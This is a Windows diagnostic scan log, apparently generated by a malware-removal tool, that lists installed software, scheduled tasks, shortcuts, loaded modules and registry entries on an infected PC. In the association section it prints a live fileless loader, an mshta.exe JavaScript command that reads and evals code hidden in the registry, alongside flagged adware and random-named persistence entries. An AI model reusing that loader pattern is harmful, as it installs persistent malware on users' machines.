Internet Explorer Toolbar 4.8 by SweetPacks (HKLM-x32\...\{DD85D6BF-4787-4A93-99A5-3F0CF0AE8834}) (Version: 4.8.0000 - SweetIM Technologies Ltd.) <==== ATTENTION
Java 8 Update 111 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Quest (remove only) (HKLM-x32\...\Jewel Quest) (Version: - )
Jewel Quest 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire III (remove only) (HKLM-x32\...\Jewel Quest Solitaire III) (Version: - )
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Kaspersky Security Scan (HKLM-x32\...\InstallWIX_{D1282694-0693-41A8-ABC1-6D1FFC1F65C5}) (Version: 16.0.0.1344 - Kaspersky Lab)
Kaspersky Security Scan (x32 Version: 16.0.0.1344 - Kaspersky Lab) Hidden
Kaspersky Software Updater Beta (HKLM-x32\...\InstallWIX_{94C8D443-1D07-4E6D-A9EB-FDBA45A839D8}) (Version: 1.5.2.228 - Kaspersky Lab)
Kaspersky Software Updater Beta (x32 Version: 1.5.2.228 - Kaspersky Lab) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2907 - CyberLink Corp.) Hidden
Letters from Nowhere Double Pack (HKLM-x32\...\5c5210d7d541dcde7bbbf44a769244f7) (Version: - )
Lottso Deluxe (HKLM-x32\...\exent_696450) (Version: - )
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft IntelliPoint 8.0 (HKLM\...\{563F041C-DFDB-437B-A1E8-E141E0906076}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Word 2002 (HKLM-x32\...\{911B0409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{B9966F27-9678-4620-9579-925E3084647E}) (Version: 07.03.0719 - Microsoft Corporation)
Microsoft Works 2004 Setup Launcher (HKLM-x32\...\Works2004Setup) (Version: - )
Microsoft Works Suite Add-in for Microsoft Word (HKLM-x32\...\{33BEE6F3-9987-4F98-A069-97A64EC8321A}) (Version: 7.0.0.0000 - Microsoft Corporation)
Mirror Magic (HKLM-x32\...\exent_764150) (Version: - )
Mortimer Beckett Double Pack (HKLM-x32\...\d7390ee1a0664e5d7ee040b11c6c5052) (Version: - )
Mozilla Firefox 50.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.0.1 (x86 en-US)) (Version: 50.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.0.1.6171 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
Off the Record: Linden Shades Collector's Edition (HKLM-x32\...\BFG-Off the Record - Linden Shades Collector's Edition) (Version: - )
Online Games Manager v1.50 (HKLM-x32\...\Online Games Manager) (Version: 1.50.4 - Real Networks, Inc.)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
PhotoNow! (x32 Version: 1.1.6904 - CyberLink Corp.) Hidden
Plants vs. Zombies (x32 Version: 2.2.0.95 - WildTangent) Hidden
Pogo Games (HKLM-x32\...\PogoDGC) (Version: 1.0 - ) <==== ATTENTION
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4204 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.)
PowerDirector (x32 Version: 8.0.3003 - CyberLink Corp.) Hidden
Puzzle Solitaire (remove only) (HKLM-x32\...\Puzzle Solitaire) (Version: - )
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.18.322.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6206 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30120 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.3023 - CyberLink Corp.) Hidden
Romance of Rome (HKLM-x32\...\4e22301604a3a670489ec087182c3f06) (Version: - )
RtVOsd (HKLM\...\{091A0130-A82F-4A6D-9C61-3BBBB3289030}) (Version: 1.0.6 - Realtek Semiconductor Corp.)
Scrabble v2.0 (HKLM-x32\...\Scrabble v2.0) (Version: - )
Slingo Deluxe (HKLM-x32\...\Slingo Deluxe) (Version: 1.0.11 - funkitron)
Spin and Win (remove only) (HKLM-x32\...\Spin and Win) (Version: - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.1.6.64 - Synaptics Incorporated)
Trend Micro Internet Security (HKLM\...\{ABBD4BA8-6703-40D2-AB1E-5BB1F7DB49A4}) (Version: 10.0 - Trend Micro Inc.)
Trend Micro Password Manager (HKLM\...\3A0FB4E3-2C0D-4572-A24D-67F1CAABDDP35_is1) (Version: 3.7.0.1100 - Trend Micro Inc.)
Trend Micro Titanium (Version: 10.0 - Trend Micro Inc.) Hidden
Unit Layers (HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Unit Layers) (Version: 9.0 - Unit Layers)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Virtual Families (x32 Version: 2.2.0.95 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.95 - WildTangent) Hidden
WeatherBug® (HKLM-x32\...\WeatherBug®) (Version: 10.0.5.29 - Earth Networks, Inc.)
Wedding Salon (HKLM-x32\...\ecf17be8f49bd825ea5bc167b3c3e6d3) (Version: - )
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (HP Games) (x32 Version: 4.0.10.16 - WildTangent) Hidden
WildTangent Games App (x32 Version: 4.0.10.16 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Word Bird Supreme (HKLM-x32\...\9d7a5d47589c0698700923dd986fcfa3) (Version: - )
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {20E9FB50-D830-4C65-944B-35B95739ADE1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-26] (Google Inc.)
Task: {2E942A7E-FA99-4DD3-BD9F-92E9AEDE3BA3} - System32\Tasks\ServicePlan => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {3E9FC981-8B08-4455-AE56-6D1AFEDDD25B} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {43C92693-EB45-4EAB-9194-65333F008151} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-26] (Google Inc.)
Task: {548B28FD-136A-485C-BD28-9BDF6807032D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-23] (HP Inc.)
Task: {60462EB9-2F6D-47D8-9B7F-1254D9A8387D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-12] (Adobe Systems Incorporated)
Task: {637754C7-7447-4AC3-936D-4523EF69C19A} - System32\Tasks\HPCustParticipation HP Photosmart 7510 series => C:\Program Files\HP\HP Photosmart 7510 series\Bin\HPCustPartic.exe [2011-08-31] (Hewlett-Packard Co.)
Task: {6ED8EB46-0910-4360-9CAE-19E27455902B} - System32\Tasks\HPCeeScheduleForOwner => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-05-12] (HP Development Company, L.P.)
Task: {7FA7EA55-5648-4603-9A45-529DEBE3EA3D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-23] (HP Inc.)
Task: {804BCEAE-303E-4887-8566-789AF9878FD3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-08-14] (HP Inc.)
Task: {93D805C2-029B-4887-9BF0-D07E575FB62D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-08-15] (HP Inc.)
Task: {C3107BB7-3615-46DF-8762-60FA1BFFC646} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {E64C4B78-C7CD-48CB-8D2F-9FACFB72AA12} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\Pogo Games\PogoDGC.exe [2013-03-25] (iWin Inc.)
Task: {EDE4CF83-5407-4471-B818-DC680F968903} - \TidyNetwork Update -> No File <==== ATTENTION
Task: {F3720C23-BEEA-49AF-B7D8-9E5993FBE08B} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForOwner.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk -> C:\Users\Owner\AppData\Local\767c1f6b\364acf2b.bat ()

ShortcutWithArgument: C:\Users\Owner\Desktop\Play Dream Day Wedding - Married in Manhatten.lnk -> C:\Remote Programs\Dream Day Wedding - Married in Manhatten\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=628950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play Legends of Solitaire Curse of the Dragons.lnk -> C:\Remote Programs\Legends of Solitaire Curse of the Dragons\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807150&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play Solitaire Kingdom Supreme.lnk -> C:\Remote Programs\Solitaire Kingdom Supreme\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=725950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play The Chronicles of Emerland Solitaire.lnk -> C:\Remote Programs\The Chronicles of Emerland Solitaire\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Villa Banana\Play Villa Banana.lnk -> C:\Remote Programs\Villa Banana\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=738050&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\The Chronicles of Emerland Solitaire\Play The Chronicles of Emerland Solitaire.lnk -> C:\Remote Programs\The Chronicles of Emerland Solitaire\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Solitaire Kingdom Supreme\Play Solitaire Kingdom Supreme.lnk -> C:\Remote Programs\Solitaire Kingdom Supreme\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=725950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Legends of Solitaire Curse of the Dragons\Play Legends of Solitaire Curse of the Dragons.lnk -> C:\Remote Programs\Legends of Solitaire Curse of the Dragons\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807150&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Dream Day Wedding - Married in Manhatten\Play Dream Day Wedding - Married in Manhatten.lnk -> C:\Remote Programs\Dream Day Wedding - Married in Manhatten\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=628950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default

==================== Loaded Modules (Whitelisted) ==============

2016-02-21 08:30 - 2015-03-31 06:08 - 00026408 _____ () C:\Program Files\Trend Micro\AMSP\boost_system-vc110-mt-1_57.dll
2016-02-21 08:30 - 2015-03-31 06:08 - 00058320 _____ () C:\Program Files\Trend Micro\AMSP\boost_date_time-vc110-mt-1_57.dll
2016-02-21 08:30 - 2015-03-31 06:09 - 00686608 _____ () C:\Program Files\Trend Micro\AMSP\sqlite3.dll
2016-02-21 08:30 - 2015-03-31 06:08 - 00110320 _____ () C:\Program Files\Trend Micro\AMSP\boost_thread-vc110-mt-1_57.dll
2016-02-21 08:30 - 2015-03-31 06:08 - 00036160 _____ () C:\Program Files\Trend Micro\AMSP\boost_chrono-vc110-mt-1_57.dll
2016-02-21 08:30 - 2015-03-31 06:09 - 01314920 _____ () C:\Program Files\Trend Micro\AMSP\libprotobuf.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00089088 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_thread-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00018944 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_system-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00049664 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_date_time-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00761856 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_regex-vc110-mt-1_52.dll
2016-02-21 08:30 - 2014-08-01 19:17 - 00048128 _____ () C:\Program Files\Trend Micro\TMIDS\boost_date_time-vc110-mt-1_49.dll
2014-09-05 19:56 - 2013-11-13 14:08 - 00146736 ____N () C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
2016-02-21 08:30 - 2016-09-01 13:31 - 40970752 _____ () C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
2010-06-18 18:26 - 2010-06-18 18:26 - 00030264 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_LogicLayer.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00052280 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HardwareAccess.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00267832 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPCommon.XmlSerializers.dll
2010-06-10 18:42 - 2010-06-10 18:42 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-09-28 03:35 - 2010-09-28 03:35 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2015-12-15 13:38 - 2015-12-15 13:38 - 00326112 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\dblite.dll
2015-10-27 16:44 - 2015-10-27 16:44 - 00404952 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\ipm_service.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 45077376 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libcef.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 01650560 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libglesv2.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 00082304 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libegl.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00061440 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00131072 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\ECenter\ECLibrary.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00040960 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00005632 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00018944 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00036864 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Microsoft.Practices.EnterpriseLibrary.ExceptionHandling.Logging.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00007680 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:426D1496 [75]
AlternateDataStreams: C:\ProgramData\Temp:8A620099 [134]
AlternateDataStreams: C:\ProgramData\Temp:9AB56A06 [172]
AlternateDataStreams: C:\ProgramData\Temp:E73B14E2 [110]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\55732387.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\55732387.sys => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30: "C:\Windows\system32\mshta.exe" "javascript:bXxl1P="oktC1";aI78=new ActiveXObject("WScript.Shell");luMP2="G";v42nLt=aI78.RegRead("HKCU\\software\\zorrezmj\\oxewpwu");LdTl1eK="v";eval(v42nLt);QT5Gd="gu1ev8s";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\trendmicro.com -> hxxps://pwm.trendmicro.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{ECC83859-F826-4E60-8C70-2679218588B5}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{2FD18DD4-08D1-44F4-90D1-0C71DB9B0B85}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{CACE2A3F-94D0-4A90-9C85-DE45A5BB75A9}] => (Allow) svchost.exe
FirewallRules: [{6E2A430E-41B8-4970-9896-E5137A06EF68}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{A3A4B663-7DAA-4562-A680-C47CAC7A17FC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector\PDR8.EXE
FirewallRules: [{AE3861D2-CD1F-47FF-9724-E3A282EA073E}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\CinemaNow\CinemaNow.exe
FirewallRules: [{A8C797C8-01D0-4B39-A2E5-574546EEB978}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\CinemaNow\CinemaNow.exe
FirewallRules: [{8F1ED23F-8124-47F8-BD9F-A386ACF70127}] => (Allow) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowShell.exe
FirewallRules: [{C993DBB6-02E1-43C3-85E5-32CF3ACCA4C5}] => (Allow) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowShell.exe
FirewallRules: [{2BDDBF74-AC62-49DB-BB26-236F0777BDF0}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD9\PowerDVD9.EXE
FirewallRules: [{89DAFBC5-CE52-4EA8-B5F6-E4E11A7574D2}] => (Allow) C:\Program Files\HP\HP Photosmart 7510 series\Bin\DeviceSetup.exe
FirewallRules: [{1589E52E-1E4D-4A40-98A8-B29A66DAAB59}] => (Allow) C:\Program Files\HP\HP Photosmart 7510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [TCP Query User{F45D6C64-5311-4C97-94C4-415A65CA7E57}C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe] => (Block) C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe
FirewallRules: [UDP Query User{2F6C9022-660B-40F7-92F1-7CA32B6A4B77}C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe] => (Block) C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe
FirewallRules: [TCP Query User{C919D2B6-A863-4693-88C5-B6D935A25902}C:\windows\syswow64\dplaysvr.exe] => (Block) C:\windows\syswow64\dplaysvr.exe
